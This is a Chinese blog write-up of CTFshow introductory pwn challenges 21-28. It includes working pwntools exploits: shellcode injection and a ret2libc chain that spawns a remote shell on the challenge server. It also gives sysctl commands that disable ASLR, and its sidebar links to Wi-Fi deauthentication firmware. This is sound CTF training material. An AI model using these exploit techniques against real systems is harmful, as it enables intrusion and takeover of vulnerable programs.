CTFSHOW-PWN入门-前置基础(21-28)

最新推荐文章于 2024-08-03 10:53:40 发布
最新推荐文章于 2024-08-03 10:53:40 发布
阅读量1.1k 收藏 11
点赞数 38
分类专栏: CTF PWN 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_84585385/article/details/140880622
版权
CTF 同时被 2 个专栏收录
5 篇文章 0 订阅
订阅专栏
PWN
5 篇文章 0 订阅
订阅专栏

目录

pwn21

QQ20240802-080929

先使用checksec查看,Partial RELRO表示.got不可写而.got.plt可写

QQ20240802-081200

查看地址

readelf -S pwn

.got的地址为0x600ff0,.got.plt的地址为0x601000

QQ20240802-081224

flag:ctfshow{0_1_0x600ff0_0x601000}

pwn22

QQ20240802-081400

先使用checksec查看,FullRELRO表示.got不可写.got.plt也不可写

QQ20240802-081510

查看地址

readelf -S pwn

.got的地址为0x600fc0

QQ20240802-081557

flag:ctfshow{0_0_0x600fc0}

pwn23

QQ20240802-082030

ctfshow函数中的strcpy函数存在栈溢出,我们尽可能输入多的字符使其溢出

QQ20240802-082114

QQ20240802-082126

连接靶机后,在pwnme后加上输入的字符,得到flag

QQ20240802-212352

flag:ctfshow{8559f5b9-c712-41f6-a8d7-732088857cb7}

pwn24

QQ20240802-082853

题目提示使用pwntools的shellcraft模块来进行攻击,因此直接编写exp

from pwn import *
p = remote("pwn.challenge.ctf.show",28311)
payload = asm(shellcraft.sh())
p.sendline(payload)
p.interactive()

拿到shell,得到flag

QQ20240802-083138

flag:ctfshow{af31e31c-4458-4d58-a563-b2e8207c7ca9}

pwn25

QQ20240802-083231

先使用checksec查看文件信息,32位程序,开启部分RELRO保护和NX保护

QQ20240802-083539

使用IDA反编译,看到读入的buf为132个长度,而read()函数限制我们读入的长度为256个长度,所以ctfshow()函数存在栈溢出。

QQ20240802-084212

使用cyclic计算栈偏移量,得出栈偏移量为140

QQ20240802-084551

QQ20240802-084601

使用objdump查看plt表中的函数,我们看到plt表中有puts函数也有write函数,这里我们使用puts函数来输出函数的内存地址。

QQ20240802-084656

exp如下:

from pwn import *
from LibcSearcher import *

context(arch='i386',os='linux',log_level='debug')
elf = ELF('./pwn')
p = remote("pwn.challenge.ctf.show",28248)  

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
ctfshow_addr = elf.symbols['ctfshow']
payload0 = b'a' * 140 + p32(puts_plt)+p32(ctfshow_addr)+p32(puts_got)
p.sendline(payload0)

puts_addr = u32(p.recv(4)) 
print(hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload = b'a' * 140 + p32(system_addr) + b'a'*4 + p32(binsh_addr)

p.sendline(payload)
p.interactive()

getshell,拿到flag

QQ20240802-085315

flag:ctfshow{6344406d-3bee-4a94-827e-90f4fb5944e8}

pwn26

QQ20240802-085803

根据题目提示,修改ASLR参数值即可得到flag

QQ20240802-102611

sysctl -w kernel.randomize_va_space=0

QQ20240802-102337

flag:ctfshow{0x400687_0x400560_0x603260_0x7ffff7fd64f0}

pwn27

QQ20240802-162921

根据题目提示,修改ASLR参数值即可得到flag

QQ20240802-163324

sysctl -w kernel.randomize_va_space=0或者

sysctl -w kernel.randomize_va_space=1

QQ20240802-163341

flag:ctfshow{0x400687_0x400560_0x603260}

pwn28

QQ20240802-205541

修改ASLR参数值为0即可得到正确的flag

sysctl -w kernel.randomize_va_space=0

QQ20240802-205810

flag:ctfshow{0x400687_0x400560}

haohao_皓皓
关注
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1667
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1265
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFSHOW-PWN入门-前置基础(29-34)
最新发布
2402_84585385的博客
08-03 1664
观察源代码发现printf函数输出了main函数的地址,我们用输出的地址减去main函数的地址就得到了偏移量,然后再用其他函数的地址加上偏移量,就能知道函数在内存中的地址了。进而我们可以利用puts函数输出got表中puts函数的地址,利用LibcSearcher模块得到puts函数在libc中的偏移,然后就能得到system函数和/bin/sh的地址了,最终拿到shell,得到flag。本题代码和上题一样,但是开启了fortify=1,仅仅在编译时检查,所以还是输入4个参数,得到flag。
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3869
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9660
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)
T1ngSh0w的博客
07-08 1470
ctfshow-pwn入门-栈溢出pwn49-mprotect函数静态链接pwn的应用
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
CTFshow-pwn入门-前置基础pwn5 - pwn12
T1ngSh0w的博客
06-17 1285
CTFshow-pwn入门-前置基础-pwn5-pwn12
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1987
ctfshow pwn入门-前置基础pwn13-pwn19
CTFshow-PWN-前置基础pwn24-pwn25)
Welcome To Myon'Blog !
04-20 687
你可以使用pwntools的shellcraft模块来进行攻击32位程序,只开了部分 RELRO 保护可以看到多出了一个 RWX: Has RWX segments这意味着二进制文件中存在至少一个段(通常是代码段),它同时拥有读、写、执行权限反编译尝试跟进 ctfshow 函数但是不行这个是它的汇编代码:使用 python 运行:拿到 shell执行命令拿到 flag:ctfshow{f615f3c6-b99a-4590-ac95-1f7baf5b974b}
CTFshow PWN入门 Test_your_nc
2301_79612324的博客
12-24 442
需使用chmod +x给文件添加可执行权限system()函数里参数为"cat /ctfshow_flag",直接nc运行即可得到flag。
CTFshow-PWN-前置基础pwn13-pwn16)
Welcome To Myon'Blog !
04-16 1234
如何使用GCC?编译运行后即可获得flag下载附件,是一个 .c 文件定义了一个字符数组 flag[],其中包含一系列 ASCII 码值,最后以NULL字符(\0)结尾,表示字符串的结束,使用 printf() 函数,其中的 %s 是格式化字符串中的一个格式说明符,用于指示 printf() 函数要打印的内容是一个字符串,将字符数组以字符串的形式输出。编译好后我们直接使用 ./ 执行得到 flag:ctfshow{hOw_t0_us3_GCC?
CTFshow-PWN入门-Test_your_nc详解
weixin_63576152的博客
07-29 1475
本文主要详解CTFshow中pwn入门第一块内容Test_your_nc的五道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境(小编的轻薄本已经容不提供的专用虚拟机了QAQ)
CTFSHOW|pwn-数学99-wp
l2645470582_的博客
11-08 723
1.检查保护机制 2.我们用64位的IDA打开该文件 查找关键字符串看到有“cat flag” 3.我们先预览一遍程序 main函数 我们看到要if语句里面的三个函数条件为真 第一个函数 第二个函数 第三个函数 在第三个函数里面条件为真就可以拿到flag(handler) 4.第一个函数:sub_9C0() 条件: 因为输入变量s是有符号数的int型:0~2147483647 -2147483648~-1 所以8 -(-...
ctfshow_pwn03 stack1
yw__y的博客
07-25 230
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值